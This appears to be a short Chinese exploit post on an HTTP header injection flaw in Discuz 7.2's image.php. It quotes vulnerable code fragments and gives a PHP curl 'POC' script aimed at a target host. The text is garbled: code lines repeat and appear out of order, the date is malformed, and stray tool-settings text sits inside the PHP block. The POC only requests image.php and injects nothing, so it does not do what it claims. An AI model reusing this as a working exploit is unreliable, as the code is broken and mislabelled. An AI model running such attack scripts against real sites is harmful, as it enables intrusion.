dz7.2 HTTP 头注入漏洞 20107/7/

image.php：

header  header('location: '.$boardurl.$thumbfile);
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

POC：

#!/usr/bin/php -f 
<?php 
# 
# image.php curl exploit 
# bincker/2010/7/7/ t00ls.net 
 
 
general settings: 
URL:   
COOKIEJAR:   
Max Exec Time:  (s)  
SSL:  BasicAuth:   
$_SERVER parameter:  
You can taint $_SERVER['PHP_SELF'] by editing the target URL.  
   
 
 
//  
// HTTP SERVER,   
//  
 
$target = $argv[1]; 
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php"); 
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); 
curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); 
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); 
$buf = curl_exec ($ch); 
curl_close($ch); 
unset($ch); 
 
echo $buf; 
 
?>